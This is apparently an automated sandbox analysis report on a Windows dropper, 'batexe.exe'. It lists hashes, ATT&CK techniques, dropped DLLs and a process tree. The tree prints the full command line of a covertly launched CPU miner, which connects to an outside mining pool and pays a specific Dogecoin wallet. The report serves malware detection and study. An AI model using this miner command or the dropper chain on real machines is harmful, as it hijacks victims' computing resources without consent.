73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
304s
platform
windows10-2004_x64
resource
win10v2004-20231222-ja
resource tags

arch:x64arch:x86image:win10v2004-20231222-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
19/02/2024, 16:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
3424	b2e.exe
636	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
636	cpuminer-sse2.exe
636	cpuminer-sse2.exe
636	cpuminer-sse2.exe
636	cpuminer-sse2.exe
636	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/2016-8-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2016 wrote to memory of 3424	2016	batexe.exe	84
PID 2016 wrote to memory of 3424	2016	batexe.exe	84
PID 2016 wrote to memory of 3424	2016	batexe.exe	84
PID 3424 wrote to memory of 764	3424	b2e.exe	86
PID 3424 wrote to memory of 764	3424	b2e.exe	86
PID 3424 wrote to memory of 764	3424	b2e.exe	86
PID 764 wrote to memory of 636	764	cmd.exe	88
PID 764 wrote to memory of 636	764	cmd.exe	88

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2016
- C:\Users\Admin\AppData\Local\Temp\6060.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\6060.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\6060.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3424
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\63AB.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:764
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:636

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\6060.tmp\b2e.exe

Filesize
4.7MB

MD5
9f453e2efea8691467d71ade4714c089

SHA1
d99106bb28247873d76ec329c985b09c0bd54f32

SHA256
1f403c2ced78cd906506f9f6432e2678535d1b062463ce30eaba1bf80d584f01

SHA512
ce03a9d6f749568fcd1cb9db69610b6844d1708066597330b438a3e43958233c34dbda8f5b6f3368236af160d5f17fff7931c89d25c4f9312a750b63bb7db348

Download Submit
C:\Users\Admin\AppData\Local\Temp\6060.tmp\b2e.exe

Filesize
1.6MB

MD5
8749eb5d76102aa9444f7bc4875a2617

SHA1
10175acef90a52e5c4f01b6506ef19537d656d85

SHA256
2939df34142864f8ec12c7d676aec70f9500d99a6f9fcc640b769be65a954bbe

SHA512
63e892a6b53973f9e42e61d2bae871dc0bceca682a00dde272dac16762929e8b38dc7582e6a1e2e904e64e7abc881efa80e742ca0fcd96301768aa0a46811b76

Download Submit
C:\Users\Admin\AppData\Local\Temp\6060.tmp\b2e.exe

Filesize
2.5MB

MD5
ca4730b74f49ae4d39fecd39c484b92e

SHA1
87a25ec97a490ceefd2a1366d0f81808e8213891

SHA256
033deebdf8971821fff5b62f865a0cb998f7cbfac0098730eb9f763588762e13

SHA512
ab5d3c64597e3faadee291a4157285b5f6cf8696565a09fbc127e1a40786d6c46c7c151053c9c6b3abfb85ad4379db0b6df0d84576341767e94051bc157e2770

Download Submit
C:\Users\Admin\AppData\Local\Temp\63AB.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
628KB

MD5
bb265d583613909c47042fcc7f844d8e

SHA1
8f21049a9c0c9d5df395504c6bd8b28d14291cfb

SHA256
650b7c9f7358c184d4c871c87d44aace0f947e8aa90a3fce6624bd59216d4840

SHA512
2b4dd79757a0f90078f4e977d5184561565396dbb83e9404acd1f01647c6b88248f2ed56ab3512861c4d0cbdf00b0244b749e142a3b1e1b97e845e7ed1f02d2b

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
392KB

MD5
ce90c06ca95bbf6c46e09d94192ae7e9

SHA1
e9562a73f4ecd2218e9a82f41b5be3bbee4c445c

SHA256
f343e30d11c84b1bae212a6666949651d5c45e9c749b3bee31bd91dd972720e5

SHA512
e80d5a3fa9f6f704eae9f1b9064186b7cdfd1279bbd7016f8c2e9402e055c1b85f7ca336ab26b422eb666773ef352324256f0450d5df728455a43330d51c6dc2

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
794KB

MD5
8f6f0bd31a3759a2dc85d79229ce1458

SHA1
362590e1ff3062549fc1c813fe50f0420c55165f

SHA256
a07a074360f7b1df4e6aa9792fbea33d03cb1bc111ef4605863c1146b361a739

SHA512
48414105884705686690e71b3312be77618e8179b5724146a3d3366eb2f09e878bd764f9133f9cdd8b3af33ba8ac6fe6dcb7385626365359a0472390c13c1b2f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
531KB

MD5
ad13e5585ff97020ca71688bf302185a

SHA1
ef69b27e9f1dfeaf519f1a3b7ba30ba1934cb53b

SHA256
b341139304a6c05e69a58be125f5fe73d87ffb8a08ddda65a0af7dfd38de94fc

SHA512
9ee2717c0ae8f18065a1facd0b47beab92e9acb96e1f8fcd0f16395cc03da6296c8bc5488efec2e9e79eaeff238df3ac84661ffc8e7ffc3c6c02476188787efb

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
432KB

MD5
a10fcdda7d536083385fbb6fdb5955a5

SHA1
07fa944125c00f563a7a9e87a1ad60508383a223

SHA256
76a9c5421a455d5c9d923da652beb4d9297c8487b35ae227350931d32833ed4e

SHA512
44fa4f15045f6e73d200916c66863bbef152d2489568cd47da786915fef05f802e8417f9bf80813dd48b940446c2e528999bbb6fafdea32d9c51b4a240fd6685

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
414KB

MD5
f9cd67b91d202315709c5356d071ef11

SHA1
d6e821d3698c8f955e9ebd6440030c1ee6ec9f7c

SHA256
6d09f498c4100c76370c9ce40f310a3a431db29767ada1d4a2c619fd8abb0c3b

SHA512
a05dd2d100af58ba16758d8a03fd326d83a0c9e054ce7405fcc90160eb163d6d3dcf13e573a29c863bb92d4d0442d55cbba42ada9c7df28af571023259ff9d66

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
304KB

MD5
0e924c59b6f65e2b2669c174b5ab5fde

SHA1
8fbb3c423df1b2022f099b86ed687e1cfc7fe320

SHA256
e157d67826fd3b2e974566740ad5ad44e0205b8063d3e54bce2fb8632e4df436

SHA512
2d4f91b95570bc1a5efbddd2e8434b98910a8ff69f6b5b70e9e26ba4e1403a0ac8d7cb3468655befd337ebd4619ce048f80a0961aee3797278c144805a99ebd3

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
297KB

MD5
8cd4a5cbf6af529780cc157b2848f258

SHA1
d03f115985c3d109c2822b08293223ba3450a3dd

SHA256
b02e62c2ecc0b2ab69c0a76da237e2a374019194c34173928cf1b74b1327304f

SHA512
059610bfffc9e3bf10061a49500c060693070e553aa2a668c0a0329ca92e84bde304338532cd605b0d5594d93f9ff69b4635846f97fdb279c49405545060239f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
198KB

MD5
aa56a8be24f671db354c25cab7a16386

SHA1
06975f4be2d24365b545ae83967fbf3e7e6957c8

SHA256
bd3255b3d478b2e2d078a52a42cc6fff407927b981cbf0f8702942190f8640e6

SHA512
42218c1ffa563ac0ff262c1066877646a0ef5d945f20b2f2c1701a8e2568e4e2dc68afb8c9e0d928385b17d98c8245dbdcdd21167bb156e2ffad866d88b639e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
590KB

MD5
7b9ed58eeb7d0599e8b3c19a0e9d719c

SHA1
db406d60948743afc97061a0b0910d3dd85c925f

SHA256
eb12716c8fdba0c1325858703c8d018f0f889f46dd8063997d9409a4e9c5cdd7

SHA512
5200c9a60fe6326b5973a9e4ff11628030b71d111c7b02481a85f94bee43c18a3092c8fbc55ebf0d56a2a9744f35a0b0ca33e6f678b6a63c95317a0104c4b98f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
360KB

MD5
2ac3a7300dff5b73e778063ee4d818eb

SHA1
256357cc2a21fa58798f19a2e4a4480b0d8c9234

SHA256
7dc4353fd5d426679eb956d6b22ae0637e5458c3f8330ff2eb257c44c746ddbb

SHA512
e5dfb637ef6df563b236fb12617d1b420ebfdc1772be9920712b226657e7c29acc304211731d1412ca3c14d1a193cb05f5d98d4180b8f753bab4a192c64a8306

Download Submit
memory/636-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/636-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/636-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/636-45-0x000000006D880000-0x000000006D918000-memory.dmp

Filesize
608KB

Download
memory/636-46-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/636-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/636-47-0x0000000001160000-0x0000000002A15000-memory.dmp

Filesize
24.7MB

Download
memory/636-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/636-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/636-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/636-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/636-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/636-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2016-8-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/3424-9-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3424-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download